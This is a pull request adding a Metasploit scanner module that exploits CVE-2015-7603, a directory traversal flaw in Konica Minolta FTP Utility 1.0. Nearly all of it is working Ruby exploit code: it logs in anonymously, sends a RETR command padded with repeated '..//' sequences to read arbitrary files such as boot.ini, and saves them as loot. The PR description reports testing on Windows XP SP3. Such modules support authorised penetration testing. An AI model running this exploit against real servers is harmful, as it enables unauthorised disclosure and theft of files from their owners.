### PR TITLE
Add konica_ftp_traversal.rb (CVE-2015-7603)

### DIFF
--- a/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb
+++ b/modules/auxiliary/scanner/ftp/konica_ftp_traversal.rb
@@ -1,0 +1,97 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Ftp
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0.
+        This vulnerability allows an attacker to download arbitrary files from the server by crafting
+        a RETR command that includes file system traversal strings such as '..//'
+      },
+      'Platform'       => 'win',
+      'Author'         =>
+        [
+          'Jay Turla',   # @shipcod3, msf
+          'James Fitts', # msf
+          'Brad Wolfe <brad.wolfe[at]gmail.com>', # msf
+          'shinnai' # initial discovery
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '38260'],
+          [ 'CVE', '2015-7603'],
+          [ 'URL', 'http://shinnai.altervista.org/exploits/SH-0024-20150922.html']
+        ],
+      'DisclosureDate' => 'Sep 22 2015'
+    ))
+
+    register_options(
+      [
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),
+        OptString.new('PATH', [ true, "Path to the file to disclose, releative to the root dir.", 'boot.ini'])
+      ], self.class)
+  end
+
+  def check_host(ip)
+    begin
+      connect
+      if /FTP Utility FTP server \(Version 1\.00\)/i === banner
+        return Exploit::CheckCode::Appears
+      end
+    ensure
+      disconnect
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def run_host(target_host)
+    begin
+      # Login anonymously and open the socket that we'll use for data retrieval.
+      connect_login
+      sock = data_connect
+      file_path = datastore['PATH']
+      file = ::File.basename(file_path)
+
+      # make RETR request and store server response message...
+      retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
+      res = send_cmd( ["RETR", retr_cmd])
+
+      # read the file data from the socket that we opened
+      response_data = sock.read(1024)
+
+      if response_data.length == 0 or ! (res =~ /^150/ )
+        print_status("File (#{file_path})from #{peer} is empty...")
+        return
+      end
+
+      # store file data to loot
+      loot_file = store_loot("konica.ftp.data", "text", rhost, response_data, file, file_path)
+      vprint_status("Data returned:\n")
+      vprint_line(response_data)
+      print_good("Stored #{file_path} to #{loot_file}")
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+      vprint_error(e.message)
+      elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")
+    rescue ::Timeout::Error, ::Errno::EPIPE => e
+      vprint_error(e.message)
+      elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")
+    ensure
+      data_disconnect
+      disconnect
+    end
+  end
+end


### PR DESCRIPTION
This module exploits a directory traversal vulnerability found in Konica Minolta FTP Utility 1.0. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//

This has been tested on Windows XP Service Pack 3. 

Vulnerable Software: https://www.exploit-db.com/apps/6388a2ae7dd2965225b3c8fad62f2b3b-ftpu_10.zip
![image](https://cloud.githubusercontent.com/assets/3483615/11134944/d665eaa0-89db-11e5-87bb-821a04a2abb6.png)
